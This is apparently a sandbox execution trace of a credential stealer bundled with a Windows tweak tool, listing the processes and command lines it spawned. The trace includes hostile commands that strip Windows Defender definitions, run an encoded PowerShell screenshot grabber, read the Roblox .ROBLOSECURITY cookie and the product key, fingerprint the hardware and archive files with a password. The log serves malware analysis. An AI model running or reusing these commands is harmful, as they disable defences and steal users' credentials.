Mode 130,45
C:\Windows\system32\reg.exe
reg add HKLM /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\CrashControl" /v "DisplayParameters" /t REG_DWORD /d "1" /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "prompt #$H#$E# & echo on & for %b in (1) do rem"
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
C:\Windows\system32\reg.exe
reg add HKCU\CONSOLE /v VirtualTerminalLevel /t REG_DWORD /d 1 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "Disclaimer"
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Program Files\Windows Defender\MpCmdRun.exe
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
C:\Windows\system32\attrib.exe
attrib -r C:\Windows\System32\drivers\etc\hosts
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
C:\Windows\system32\attrib.exe
attrib +r C:\Windows\System32\drivers\etc\hosts
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rkt2fkxp\rkt2fkxp.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7C35.tmp" "c:\Users\Admin\AppData\Local\Temp\rkt2fkxp\CSCA56DE6D1AF5D49FCBCBCAC41BC1EE192.TMP"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI22922\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\n8T1k.zip" *"
C:\Users\Admin\AppData\Local\Temp\_MEI22922\rar.exe
C:\Users\Admin\AppData\Local\Temp\_MEI22922\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\n8T1k.zip" *
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Wbem\WMIC.exe
wmic os get Caption
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Hone" /v "Disclaimer" /f
C:\Windows\system32\curl.exe
curl -g -L -# -o "C:\Users\Admin\AppData\Local\Temp\Updater.bat" "https://raw.githubusercontent.com/auraside/HoneCtrl/main/Files/HoneCtrlVer"
C:\Windows\system32\Dism.exe
dism /online /enable-feature /featurename:MicrosoftWindowsWMICore /NoRestart
C:\Users\Admin\AppData\Local\Temp\54FF01A5-1812-4108-8CF6-2226B7F3F407\dismhost.exe
C:\Users\Admin\AppData\Local\Temp\54FF01A5-1812-4108-8CF6-2226B7F3F407\dismhost.exe {3F511729-BF4E-4763-8326-9B58EB2EF9F5}
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.4467_none_7e0f83e07c8c1985\TiWorker.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.4467_none_7e0f83e07c8c1985\TiWorker.exe -Embedding
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "SystemRestorePointCreationFrequency" /t REG_DWORD /d 0 /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy Unrestricted -NoProfile Enable-ComputerRestore -Drive 'C:\', 'D:\', 'E:\', 'F:\', 'G:\'
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy Unrestricted -NoProfile Checkpoint-Computer -Description 'Hone Restore Point'
C:\Windows\system32\srtasks.exe
C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:4
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c date /t
C:\Windows\system32\reg.exe
reg export HKCU C:\Hone\HoneRevert\11.14.2024\HKLM.reg /y
C:\Windows\system32\reg.exe
reg export HKCU C:\Hone\HoneRevert\11.14.2024\HKCU.reg /y
C:\Windows\system32\mode.com
Mode 130,45
C:\Windows\System32\choice.exe
C:\Windows\System32\choice.exe /c:1234567XD /n /m " Select a corresponding number to the options above > "
C:\Windows\system32\mode.com
Mode 130,45
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic path win32_VideoController get PNPDeviceID | findstr /L "VEN_"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get PNPDeviceID
C:\Windows\system32\findstr.exe
findstr /L "VEN_"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic path Win32_NetworkAdapter get PNPDeviceID | findstr /L "VEN_"
C:\Windows\System32\Wbem\WMIC.exe
wmic path Win32_NetworkAdapter get PNPDeviceID
C:\Windows\system32\findstr.exe
findstr /L "VEN_"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic os get TotalVisibleMemorySize /value
C:\Windows\System32\Wbem\WMIC.exe
wmic os get TotalVisibleMemorySize /value
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "NVTTweaks"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA" | findstr "HKEY"
C:\Windows\system32\reg.exe
reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA"
C:\Windows\system32\findstr.exe
findstr "HKEY"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemption"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableCudaContextPreemption"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "EnableCEPreemption"
C:\Windows\system32\find.exe
find "0x0"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemptionOnS3S4"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "ComputePreemption"
C:\Windows\system32\find.exe
find "0x0"
C:\Windows\system32\reg.exe
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v CpuPriorityClass
C:\Windows\system32\find.exe
find "0x4"
C:\Windows\system32\reg.exe
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v IoPriority
C:\Windows\system32\find.exe
find "0x3"
C:\Windows\system32\powercfg.exe
powercfg /GetActiveScheme
C:\Windows\system32\find.exe
find "Hone"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "AllGPUTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "NpiTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "TCPIP"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "NvidiaTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "MemoryTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "InternetTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "ServicesTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "DebloatTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "MitigationsTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "AffinityTweaks"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableWriteCombining"
C:\Windows\system32\reg.exe
reg query "HKCU\Control Panel\Mouse" /v "SmoothMouseYCurve"
C:\Windows\system32\find.exe
find "0000000000000000000038000000000000007000000000000000A800000000000000E00000000000"
C:\Windows\system32\reg.exe
reg query "HKLM\SOFTWARE\Intel\GMM" /v "DedicatedSegmentSize"
C:\Windows\system32\find.exe
find "0x400"
C:\Windows\system32\sc.exe
sc query STR
C:\Windows\system32\find.exe
find "RUNNING"
C:\Windows\system32\sc.exe
sc query HoneAudio
C:\Windows\system32\find.exe
find "RUNNING"
C:\Windows\System32\Wbem\WMIC.exe
wmic path Win32_Battery Get BatteryStatus
C:\Windows\system32\find.exe
find "1"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic path Win32_VideoController get VideoProcessor /value
C:\Windows\System32\Wbem\WMIC.exe
wmic path Win32_VideoController get VideoProcessor /value
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "GeForce"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "NVIDIA"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "RTX"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "GTX"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "AMD"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "Ryzen"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "Intel"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "UHD"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo [91mOFF "
C:\Windows\system32\find.exe
find "N/A"
